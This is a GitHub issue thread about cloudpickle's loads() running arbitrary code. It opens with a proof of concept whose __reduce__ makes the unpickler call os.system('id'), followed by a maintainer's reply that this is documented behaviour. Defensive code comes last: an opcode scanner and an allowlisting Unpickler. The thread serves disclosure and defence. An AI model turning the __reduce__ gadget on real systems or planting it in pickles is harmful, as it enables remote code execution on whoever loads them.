cloudpipe / cloudpickle

Extended pickling support for Python objects

Deserialising Untrusted Data in loads() leads to Arbitrary Code Execution. #512

Closed ajmalabubakkr closed 1 year ago

ajmalabubakkr commented 1 year ago
```python
# poc.py
import os
import cloudpickle

class RCE:
    # __reduce__ tells the unpickler which callable to invoke, and with which
    # arguments, when this object is rebuilt; here that is os.system("id").
    def __reduce__(self):
        cmd = 'id'
        return os.system, (cmd,)

if __name__ == '__main__':
    with open('pickle.pkl', 'wb') as pkl:
        pkl.write(cloudpickle.dumps(RCE()))
        print("[+] Hit")
    with open("pickle.pkl", "rb") as pkl_file:
        print("[+] Hit 2")
        p = cloudpickle.load(pkl_file)  # os.system("id") runs here, before "Hit 3"
        print("[+] Hit 3")
```

POC

[screenshots of the PoC run]

Description

cloudpickle inherits the same dangerous loads function from the normal pickle module.

ogrisel commented 1 year ago

This is expected as cloudpickle is an extension of the regular pickle module. Its main purpose is to ship arbitrary code between workers of a distributed computing cluster (such as dask, ray, pyspark...).

This is all documented in the readme of the project:

https://github.com/cloudpipe/cloudpickle#cloudpickle

Furthermore, the cloudpickle.loads function is just a convenience alias to the pickle.loads function of the standard library.
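Neither the PoC nor the reply shows what a consumer of pickles from a less-trusted source can do about the `__reduce__` gadget, so here is an added example. It is my code, not code from this issue or from the cloudpickle project, and it uses only the standard library: since cloudpickle.loads is pickle.loads, as ogrisel says above, a restriction applied to pickle.Unpickler covers cloudpickle's load path as well. The names RestrictedUnpickler, ALLOWED_GLOBALS, referenced_globals and the harmless CallGetcwd gadget are mine, and building the payload with stdlib pickle.dumps instead of cloudpickle.dumps is an assumption made so the block runs without cloudpickle installed. It goes beyond the issue in two ways: a static scan of the opcode stream for the globals a payload will import, and an allowlisting find_class that refuses to resolve os.system (or any other gadget) at load time.

```python
import io
import os
import pickle
import pickletools

# --- attacker side: the same __reduce__ trick as the issue's PoC -------------

class RCE:
    """Mirror of the issue's payload: on load, the unpickler calls os.system(cmd)."""
    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return os.system, (self.cmd,)


class CallGetcwd:
    """Constructed harmless gadget: the unpickler calls os.getcwd() and hands back
    its return value, which proves the callable really executed during load."""
    def __reduce__(self):
        return os.getcwd, ()


def build_payload(obj) -> bytes:
    # Assumption: stdlib pickle.dumps stands in for cloudpickle.dumps here. The
    # load side is what matters, and cloudpickle.loads is pickle.loads.
    return pickle.dumps(obj)


# --- triage: which globals does this stream ask the unpickler to import? -----

def referenced_globals(payload: bytes) -> list[tuple[str, str]]:
    """Static scan of the opcode stream for global lookups.

    GLOBAL (protocol <= 3) carries "module name" inline; STACK_GLOBAL
    (protocol >= 4) takes module and name from the two most recent string
    pushes. Triage heuristic only (strings fetched back via BINGET are not
    tracked); the find_class allowlist below is the enforcement point.
    """
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(payload):
        if op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


# --- defender side: an Unpickler that only resolves allowlisted globals ------

ALLOWED_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Every class or function reference in the stream is resolved through
    find_class, so overriding it is the documented hook for vetoing os.system,
    builtins.eval, subprocess.Popen or any other gadget a __reduce__ names."""
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve global {module}.{name}")


def unrestricted_loads(payload: bytes):
    # What the issue exercises as cloudpickle.loads: stdlib loads, no restrictions.
    return pickle.loads(payload)


def restricted_loads(payload: bytes):
    return RestrictedUnpickler(io.BytesIO(payload)).load()


def is_rejected(payload: bytes) -> bool:
    try:
        restricted_loads(payload)
    except pickle.UnpicklingError:
        return True
    return False


def demo() -> dict:
    """Run the payloads through both loaders and report what happened."""
    rce = build_payload(RCE("id"))
    cwd = build_payload(CallGetcwd())
    data = build_payload({"ids": [1, 2, 3], "tags": {"a", "b"}})
    return {
        "rce_globals": referenced_globals(rce),  # [('posix', 'system')] on POSIX, 'nt' on Windows
        "rce_rejected": is_rejected(rce),        # True: os.system is never resolved
        "cwd_gadget_ran": unrestricted_loads(cwd) == os.getcwd(),  # True: plain loads called it
        "cwd_rejected": is_rejected(cwd),        # True
        "plain_data_ok": restricted_loads(data) == {"ids": [1, 2, 3], "tags": {"a", "b"}},  # True
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two caveats. The allowlist gates only global lookups. That is enough to stop every `__reduce__` gadget, because the callable a REDUCE opcode invokes has to enter the stream through find_class (persistent IDs and the copyreg extension registry aside, both empty by default), but it bounds neither memory nor CPU spent on a hostile stream, and it will also reject legitimate cloudpickle output for dynamically defined functions, whose reconstruction helpers must themselves be resolved as globals. For input that is genuinely untrusted the advice in the pickle documentation stands: do not unpickle it at all; use a data-only format such as JSON.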